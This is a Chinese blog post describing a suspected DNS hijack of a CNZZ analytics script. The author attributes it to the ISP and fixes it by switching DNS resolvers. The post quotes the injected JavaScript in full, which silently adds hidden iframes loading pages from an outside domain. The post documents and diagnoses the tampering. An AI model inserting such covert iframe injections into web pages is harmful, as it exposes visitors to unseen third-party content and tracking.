概述
完全是无意中发现的,因为这个劫持并没有出现广告。
访问 http://demo.liuxianan.com 时,控制台竟然发现一个奇怪的地址:http://gxtj01.statis.wayayaya.com:5001/gxtj01.php
最后发现被劫持的竟然是CNZZ的一个js文件,用电脑访问如下地址:
http://c.cnzz.com/core.php?web_id=1257135263&t=z
返回:
var c=document.createElement('script');c.type='text/javascript';c.src='http://c.cnzz.com/core.php?web_id=1257135263&t=z?c=c';document.getElementsByTagName('head')[0].appendChild(c);var c=document.createElement('iframe');c.setAttribute('style','display:none');c.src='http://gxtj01.statis.wayayaya.com:5001/gxtj01.php';document.getElementsByTagName('head')[0].appendChild(c);var c=document.createElement('iframe');c.setAttribute('style','display:none');c.src='http://wechat.statis.wayayaya.com:5001/wechat.php';document.getElementsByTagName('head')[0].appendChild(c);
但是手机访问时返回正常的js,同样的地址不同设备访问返回的内容不一样,不用说肯定是DNS被劫持了。
继续
看了一下本机的DNS,由于之前经常改域名IP,所以配置了阿里云的公共DNS223.5.5.5
:
然后修改成谷歌的8.8.8.8
之后再刷新上面的地址,好家伙,立马正常了:
最后
该死的运营商可恶至极!差点让我错怪CNZZ了。
补充
发现被劫持的不止是CNZZ,多说评论框也被劫持了:
还是更换为谷歌DNS就没问题了。